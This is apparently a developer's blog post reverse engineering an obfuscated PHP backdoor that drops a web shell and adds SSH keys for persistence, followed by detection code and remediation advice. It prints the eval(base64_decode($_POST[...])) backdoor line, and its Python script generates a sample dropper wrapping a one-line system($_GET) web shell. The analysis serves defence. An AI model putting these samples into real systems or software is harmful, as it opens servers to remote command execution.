As developers and system architects, we often secure our code but neglect the silent threats lurking in old directories or hidden behind clever obfuscation. Recently, I caught a stealthy PHP backdoor ((random_name).php) embedded in a system.
Instead of just deleting it, I decided to fully reverse engineer it to understand exactly how it works, how it bypasses scanners, and how it maintains persistence on a server.
Here is a quick summary of what I found during the analysis.
The Anatomy of the Malware
At first glance, the file was heavily obfuscated using multiple layers of encoding so that it looked like harmless gibberish. However, the core mechanism relied on a classic but dangerous pattern:
```php
<?php
// The malicious pattern used to execute hidden code: whatever the client
// sends in the encoded_payload POST field is base64-decoded and run as PHP.
eval(base64_decode($_POST['encoded_payload']));
```

Key Techniques Used by the Attacker:
Layered Obfuscation: The code utilized deep base64 nesting combined with string manipulation functions to evade signature-based security scanners.
Hidden Tar Extraction: Deep inside the encoded strings, the malware contained a compressed TAR structure. Once triggered, it extracts a full-featured web shell into the server directories.
SSH Persistence: The ultimate goal wasn't just to execute commands once. The script was designed to inject malicious public keys into the server's ~/.ssh/authorized_keys file, granting the attacker permanent, direct SSH access that never touches the web server and therefore leaves no footprint in the web logs (the logins do still appear in the SSH daemon's auth log, which is worth checking).
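All three techniques can be checked for statically instead of running the file. The Python script below is an added example, not the author's analysis code and not anything from the linked repository. It builds a constructed sample in the same shape (a dropper carrying an embedded TAR archive, wrapped in three eval() layers using base64, raw DEFLATE as produced by PHP's gzdeflate/gzinflate, str_rot13 and strrev), peels the layers by applying the inverse of each wrapper innermost-first, flags the eval(base64_decode($_POST[...])) pattern in the innermost code, and lists the members of any base64 literal that decodes to a ustar archive. The dropper path, the archive member name and the PHP inside it are placeholders.

```python
import base64
import codecs
import io
import re
import tarfile
import zlib

# --- Constructed sample (not the malware from the post): a dropper that
# carries a TAR archive plus the core eval(base64_decode($_POST[...]))
# pattern, wrapped in three obfuscation layers. Paths/names are placeholders.
DROPPER = (
    "$t = base64_decode('%s');\n"
    "file_put_contents('/var/www/html/.cache/shell.tar', $t);\n"
    "eval(base64_decode($_POST['encoded_payload']));"
)

def _make_tar(name: str, content: bytes) -> bytes:
    """Build a minimal uncompressed ustar archive holding one file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        info = tarfile.TarInfo(name)
        info.size = len(content)
        tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()

def _deflate_raw(data: bytes) -> bytes:
    """Raw DEFLATE with no zlib header, i.e. what PHP's gzdeflate() produces."""
    c = zlib.compressobj(level=9, wbits=-15)
    return c.compress(data) + c.flush()

def build_sample() -> str:
    """Wrap the dropper in strrev -> str_rot13 -> gzinflate layers (outermost first)."""
    b64 = lambda b: base64.b64encode(b).decode()
    inner = DROPPER % b64(_make_tar("shell.php", b"<?php system($_GET['c']); ?>"))
    layer1 = "eval(gzinflate(base64_decode('%s')));" % b64(_deflate_raw(inner.encode()))
    layer2 = "eval(str_rot13(base64_decode('%s')));" % b64(codecs.encode(layer1, "rot_13").encode())
    return "<?php eval(base64_decode(strrev('%s'))); ?>" % b64(layer2.encode())[::-1]

# Inverse of each wrapper function PHP would call at runtime.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": zlib.decompress,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

# eval( f1( f2( ... 'literal' ) ) ) with a string literal at the centre.
LAYER_RE = re.compile(r"eval\(\s*((?:\w+\s*\(\s*)+)(['\"])(.*?)\2\s*\)+")
REQUEST_EVAL_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b")
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/=]{200,})['\"]")

def peel(code: str, max_layers: int = 32):
    """Statically unwrap eval() layers; returns (innermost code, list of wrapper chains)."""
    layers = []
    for _ in range(max_layers):
        m = LAYER_RE.search(code)
        if not m:
            break
        funcs = re.findall(r"\w+", m.group(1))
        data = m.group(3).encode("latin-1")
        for f in reversed(funcs):            # PHP evaluates the innermost call first
            if f not in DECODERS:
                raise ValueError("unsupported wrapper: " + f)
            data = DECODERS[f](data)
        layers.append(funcs)
        code = data.decode("latin-1")
    return code, layers

def find_embedded_tars(code: str) -> list:
    """Decode long base64 literals and list member names of any that are TAR archives."""
    members = []
    for lit in B64_LITERAL_RE.findall(code):
        try:
            blob = base64.b64decode(lit, validate=True)
        except ValueError:
            continue
        if len(blob) >= 512 and blob[257:262] == b"ustar":   # ustar magic at offset 257
            with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tf:
                members.extend(tf.getnames())
    return members

def analyse(code: str) -> dict:
    payload, layers = peel(code)
    return {
        "layer_count": len(layers),
        "layers": layers,
        "evals_request_input": bool(REQUEST_EVAL_RE.search(payload)),
        "embedded_tar_members": find_embedded_tars(payload),
        "payload": payload,
    }

if __name__ == "__main__":
    report = analyse(build_sample())
    for key in ("layer_count", "layers", "evals_request_input", "embedded_tar_members"):
        print(key, "=", report[key])
    print(report["payload"][:60] + "...")
```

Running the script on the sample reports three layers, the request-driven eval in the innermost code and a single archive member, shell.php. Real samples add wrappers not in DECODERS (custom XOR loops, chr()/ord() builders), which is why peel() stops and raises on an unknown function instead of silently skipping it.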
How to Protect Your System
If you suspect your server has been compromised, simply deleting the .php file might not be enough. You need to:
Check ~/.ssh/authorized_keys for unauthorized entries, for every account on the host (root, the web server user and any service accounts), not just your own.
Audit your cron jobs (the system crontab, /etc/cron.d and every user's crontab) to ensure the malware doesn't have a re-infection script scheduled.
Implement strict file permissions (chmod 644 for files, 755 for directories, and no write access for the PHP worker outside the directories that genuinely need it) and disable dangerous PHP functions such as exec(), shell_exec(), system(), passthru(), proc_open() and popen() via disable_functions in your php.ini. Note that eval() is a language construct, not a function, so disable_functions cannot switch it off; catching eval-based droppers is a job for code review and file-integrity monitoring of the web root.
Read the Full Deep Dive
I have documented the complete step-by-step deobfuscation process, the code breakdown, directory structures, and full remediation steps on GitHub.
See the full analysis and source code breakdown here:
https://github.com/KhaiTrang1995/Malware-Analysis-Reports-PHP-Backdoor
Tags: #php #security #devsecops #malware